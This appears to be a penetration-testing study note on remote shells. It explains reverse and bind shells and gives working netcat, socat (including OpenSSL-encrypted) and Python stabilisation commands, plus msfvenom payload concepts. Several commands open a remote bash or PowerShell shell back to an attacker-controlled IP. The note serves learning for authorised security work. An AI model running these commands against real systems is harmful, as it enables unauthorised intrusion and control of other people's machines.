
## what is a shell

Shells are interfaces for the command line (CLI), like bash in Linux or cmd.exe in Windows. When targeting remote systems, we may exploit vulnerabilities to execute code. In such cases, we aim to gain a shell on the target for control and execution of commands.

Two Types of shell : 
1. Reverse shell - A reverse shell is initiated by the target system to connect back to the attacker's system, allowing the attacker to gain remote access

2. Bind Shell - a bind shell is set up by the attacker on the target system, waiting for the attacker to connect to it.

## Tools

**Netcat** - often abbreviated as nc, is a versatile networking utility used for reading from and writing to network connections

**Socat** - A more stable and stronger version of netcat

**Metasploit** — multi/handler:The exploit/multi/handler module of the Metasploit framework is, like socat and netcat, used to receive reverse shells.

**Msfvenom** - Like multi/handler, msfvenom is technically part of the Metasploit Framework, however, it is shipped as a standalone tool. Msfvenom is used to generate payloads on the fly. Whilst msfvenom can generate payloads other than reverse and bind shells, these are what we will be focusing on

Some Useful repo :

[Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)

[Reverse Shell Cheatsheet](https://web.archive.org/web/20200901140719/http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)

## Netcat

**Reverse Shell**

```bash
nc -lvnp <port-number>
```

**Bind Shell**

```bash
nc <target-ip> <chosen-port>
```

## Netcat Shell Stabilisation

### with Python

```bash
#spawn a better featured bash shell. (that some targets may need the version of Python specified.)

python -c 'import pty;pty.spawn("/bin/bash")'

# Give Access to term cmd (such as clear)

export TERM=xterm

# turns off our own terminal echo (gives us access to tab, autocompletes)

stty raw -echo; fg

```

> [!note] pty.spawn() : pty.spawn() in Python creates a virtual terminal for communication between a Python script and command-line programs. It's like a chat room where Python sends commands and receives responses from the program, allowing automation of command-line tasks.


### with rlwrap

`rlwrap` is a program which gives us access to history, tab autocompletion and other features upon receiving a shell.

```bash
# install rlwrap
sudo apt install rlwrap

# usage

rlwrap nc -lvnp <port>

```

`rlwrap` useful when dealing with windows shell, which are difficult to stabilise.

when dealing with linux target, you can use `step 3` from python for more stabilised shell.

## Socat

**Reverse shells**

```bash
# equals to nc -nvlp <port>
socat TCP-L:<port>

#Command to connect back
#Windows
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
        
#Linux 
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"

```

**Bind Shell**
Command to connect
- Windows: `socat TCP-L:<PORT> EXEC:powershell.exe,pipes`
- Linux: `socat TCP-L:<PORT> EXEC:"bash -li"`
    
- Command on our attacking machine to connect to the waiting listener: `socat TCP:<TARGET-IP>:<TARGET-PORT> -`
    
- A more stable and Linux only command: ``socat TCP-L:<port> FILE:`tty`,raw,echo=0``
## Socat encrypted shells
Getting an encrypted **reverse shell**:
- First, generate certificate: `openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt`
- The command above creates a 2048-bit RSA key with a matching cert file - valid for 1 year
- Now, merge two created files into one: `cat shell.key shell.crt > shell.pem`
- Reverse shell listener on attacker machine: `socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -`
- Execute command on victim machine: `socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash`
    
Getting an encrypted **bind shell**:
- Run in Target machine: `socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes`
- Attacker machine: `socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -` 

Note: Even for windows target, use certificate with listener.



## msfvenom
The standard syntax for msfvenom: `msfvenom -p <PAYLOAD> <OPTIONS>`

There are 2 type of **reverse shell** payloads:

1. **Staged**: This payload has 2 parts
    
    1. Stager: This goes to the server and initiate a reverse connection only. It has no payload in it
        
    2. Reverse shell code: This bulk code is downloaded after an initial connection.
        
    
2. **Stageless**: The whole reverse shell code gets uploaded to a server for a connection back. These are easy to detect by detection software.
    

A very good cheat sheet about msfvenom: [**Link here**](https://thor-sec.com/cheatsheet/oscp/msfvenom_cheat_sheet/)























